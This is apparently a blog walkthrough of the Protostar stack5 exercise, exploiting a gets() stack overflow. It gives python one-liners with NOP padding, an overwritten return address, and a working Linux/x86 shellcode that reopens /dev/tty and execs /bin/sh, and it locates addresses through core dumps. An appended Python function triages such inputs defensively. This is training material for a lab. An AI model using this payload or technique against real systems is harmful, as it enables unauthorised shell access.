This is similar to the previous exercise, however there is no winner function we might be able to call. We have to provide our own shellcode and jump to it.

I started with the solution of the previous exercise. I appended 0xcc after the address. 0xcc is INT 3. This instruction stops the application, so that we can debug it. I also updated the address to jump onto the 0xcc.

I saved the input into a file:

$ echo `python -c 'print "\x90"*76 + "\xd0\xfc\xff\xbf" + "\xcc"'` > /tmp/1

Then I started gdb and ran the application, redirecting the input from the file.

(gdb) r < /tmp/1

The execution stopped as we expected. The application stopped with SIGTRAP.

Here comes the tough part. A simple shellcode did not work for me. I found the answer here: Linux/x86 – stdin re-open and /bin/sh exec Shellcode (39 bytes)

In case of a gets buffer overflow, the stdin should be closed and reopened. I used this shellcode to get a shell.

I modified the solution and placed the shellcode after the RET address. The updated solution:

$ echo `python -c 'print "\x90"*76 + "\xd0\xfc\xff\xbf" + "\xcc" + "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'` > /tmp/1

When I tried this without gdb, the exploit did not work. The address was definitely different. Another way to figure out the correct addresses without gdb is to use core dump files. To generate core dump files, set /proc/sys/fs/suid_dumpable to 2. This can be done only as root. Also set the core limit to unlimited.

# echo 2 > /proc/sys/fs/suid_dumpable

$ ulimit -c unlimited

The core dump file will be generated under the /tmp folder as the core_pattern suggests.

$ cat /proc/sys/kernel/core_pattern

Now let us set the address to 0x41414141 and run the program to generate a core dump file.

$ echo `python -c 'print "\x90"*76 + "\x41\x41\x41\x41" + "\x90"*32 + "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'` > /tmp/1

$ cat /tmp/1 | /opt/protostar/bin/stack5
Segmentation fault (core dumped)

Let us load the core dump file into gdb. First we have to set appropriate rights.

# chmod 666 core.11.stack5.3241

$ gdb /opt/protostar/bin/stack5 --core=/tmp/core.11.stack5.3241


Now we can update the address with a correct value.

$ echo `python -c 'print "\x90"*76 + "\xf0\xfc\xff\xbf" + "\x90"*32 + "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'` > /tmp/1
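
A defensive view of the input layout used above, as an added example that is not part of the original write-up: a small triage function that splits a captured stdin blob at the 76-byte offset and flags the traits this kind of input has (a stack-range return address, a NOP sled, syscall bytes). The stack range, the 16-byte sled threshold and the marker list are assumptions, and both sample inputs are constructed, with an inert tail in place of real shellcode.

```python
import struct

RET_OFFSET = 76  # filler bytes before the saved return address, per the write-up
STACK_RANGE = (0xBF000000, 0xC0000000)  # assumption: 32-bit Linux stack, no ASLR
MARKERS = {b"\xcd\x80": "int 0x80 syscall", b"\xcc": "int3 breakpoint",
           b"/bin": "path fragment /bin", b"/sh": "path fragment /sh"}

def triage(blob, ret_offset=RET_OFFSET):
    """Describe how a captured stdin blob would land on the vulnerable frame."""
    line = blob.split(b"\n", 1)[0]  # gets() stops reading at the first newline
    report = {"consumed": len(line), "ret": None, "sled": 0, "findings": []}
    if len(line) < ret_offset + 4:
        return report  # saved return address is not fully overwritten
    report["ret"] = struct.unpack_from("<I", line, ret_offset)[0]  # little-endian
    report["findings"].append("saved return address overwritten")
    if STACK_RANGE[0] <= report["ret"] < STACK_RANGE[1]:
        report["findings"].append("return address points into the stack")
    tail = line[ret_offset + 4:]
    # Length of the run of 0x90 bytes that directly follows the return address.
    report["sled"] = len(tail) - len(tail.lstrip(b"\x90"))
    if report["sled"] >= 16:  # assumed threshold
        report["findings"].append("NOP sled after return address")
    for needle, label in MARKERS.items():
        if needle in tail:
            report["findings"].append(label + " in tail")
    return report

# Constructed samples: the page's layout with an inert tail, and a plain long line.
SUSPECT = (b"\x90" * 76 + struct.pack("<I", 0xBFFFFCF0) + b"\x90" * 32
           + b"\xcd\x80" + b"/bin//sh" + b"\n")
OVERLONG = b"A" * 100 + b"\n"

if __name__ == "__main__":
    for name, blob in (("suspect", SUSPECT), ("overlong", OVERLONG)):
        r = triage(blob)
        ret = "-" if r["ret"] is None else hex(r["ret"])
        print(name, r["consumed"], ret, r["sled"], r["findings"])
```
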
